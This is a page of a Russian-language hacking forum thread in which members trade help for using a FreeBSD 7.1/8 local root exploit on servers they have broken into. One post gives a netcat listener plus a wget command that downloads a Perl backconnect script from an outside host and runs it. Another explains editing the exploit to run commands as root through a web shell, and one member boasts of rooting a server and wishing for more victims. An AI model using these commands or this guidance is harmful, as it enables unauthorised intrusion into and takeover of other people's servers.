FreeBSD 7.1, 8 root expl.

Discussion in 'Уязвимости' started by BlackSun, 1 Dec 2009.

  1. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    wkar, без рута ты не установишь gcc. Варинат скомпилировать на другой фряхе и залить туда уже бинарник. И тебе нужно вернуть себе бек конект как сказал Тузик.
     
  2. Ty3uK

    Ty3uK Member

    Joined:
    1 Feb 2009
    Messages:
    35
    Likes Received:
    28
    Reputations:
    0
    ещё можна проверить наличие gcc командой: gcc --help и я могу дать скомпиленые бинарники, но обязательно нужен или биндшелл или бекконнект
     
  3. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    63
    Reputations:
    34
    gcc нет, это точно."я могу дать скомпиленые бинарники"Если можешь то дай, буду благодарен.
    И ещё, дайте немного маны, как зделать бекконнект.
     
    1 person likes this.
  4. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,167
    Reputations:
    446
    у себя
    netcat -l -n -v -p 5995

    на хосте
    wget -O ngix http://fsb-my.name/c/apache-handler
    perl ngix your_ip 5995 2> /dev/null &
     
    1 person likes this.
  5. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    63
    Reputations:
    34
    спасибо за бекдор, поделитесь ещё кто-то скомпилированными бинарниками.
     
  6. KosoyRoman

    KosoyRoman Banned

    Joined:
    14 Sep 2008
    Messages:
    51
    Likes Received:
    12
    Reputations:
    -5
    А есть у кого на 6.2 ??
     
  7. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    358
    Likes Received:
    313
    Reputations:
    163
    возможно что-то сделать? :( хз что делать..

    Code:
    ./qwe.sh
    ./qwe: Permission denied
    
    6.2-RELEASE-p8 FreeBSD 6.2-RELEASE-p8 #0: Mon Nov 12 17:30:06 EET 2007
     
  8. GizmoSB

    GizmoSB New Member

    Joined:
    14 Feb 2010
    Messages:
    75
    Likes Received:
    2
    Reputations:
    0
    пожалуйста выложите скомпиленный сплоит (((((никак скомпилить не могу (((( Спасибо
     
  9. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    Ты наврено запускаешь из /tmp а он примантирован как no ex, корчое скопируй в другую папку куда-нить. Правда я неуверен что возьмёт 6.2 но попробуй , отпишись.

    З.Ы. Есть вариант что надо сделать chmod 755 на твой скрипт.

    GizmoSB, у меня ниразу не получилось скомпилить со скрипта, компиль просто кусками. Из скрипта скопируй куски кода и скомпиль.
     
    #29 kfor, 15 Feb 2010
    Last edited: 15 Feb 2010
  10. overxor

    overxor Member

    Joined:
    11 Sep 2009
    Messages:
    32
    Likes Received:
    9
    Reputations:
    0
    На самом деле бэкконнект не всегда получается делать. В этом случае можно немного поправить сплойт:
    system("echo ALEX-ALEX;/bin/sh");
    на system("echo ALEX-ALEX;/bin/sh cmd.sh");
    после повышения привелегий сплойт будет вполнять команды из cmd.sh под рутом.
    Запуск сплойта в вебшеле: w00t.sh &> out.txt. Перенаправление лучше делать потому, что веб шел не выводит stderr поток и мы не увидим ошибок. Результат читаем из out.txt.
     
  11. wwwall

    wwwall New Member

    Joined:
    2 Dec 2006
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    возможно ли вместо wget использовать $_GET?
    т.е. чисто на пхп, не используя консольные команды
    возможно ли какнибудь запустить на хосте то что накомпелено в домашних условия, при услонии что не работает с/перл/командная строка
    + нет доступа к папкам до /public_html/
    в этой ситуации можно получить рут? :confused:
     
  12. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,167
    Reputations:
    446
    Возможно ли использовать вместо программы-качалки массив из высокоуровниевого языка?
    Возможно ли использовать вместо бензопилы бабушикины спицы, правда они погнулись?
    Возможно ли швее-мотористке проектировать ядерные реакторы?

    Если включен сеф мод и\или вырублены нужные функции - гугли вначале обход этих ограничений.
     
    2 people like this.
  13. rat.energizer

    rat.energizer New Member

    Joined:
    12 Mar 2010
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Скорее всего noexec флаг.
    mount или /etc/fstab глянь и выбери диру другую
     
  14. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    697
    Likes Received:
    404
    Reputations:
    134
    chmod +x filename
     
  15. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    6-ку не берёт вроде этот сплойт
     
  16. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    306
    Likes Received:
    35
    Reputations:
    0
    кто поможет порутать 8?
     
  17. zerling

    zerling New Member

    Joined:
    4 Jan 2008
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    рутанул сегодня вот такой сервачок )
    при срабатывании сплоита в констоль выкинуло вот это
    /libexec/ld-elf.so.1: environment corrupt; missing value for
    /libexec/ld-elf.so.1: environment corrupt; missing value for
    /libexec/ld-elf.so.1: environment corrupt; missing value for
    /libexec/ld-elf.so.1: environment corrupt; missing value for
    /libexec/ld-elf.so.1: environment corrupt; missing value for
    ALEX-ALEX
    До этого много серваков с подходящими версиями не хотели рутаться
    Эх жаль я профукал появление этого сплоита в декабре, жертв было бы гораздо больше )
     
  18. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    через sh не получилось,кто может помоч по кускам выполнить стукните 600-zero91-642
     
Loading...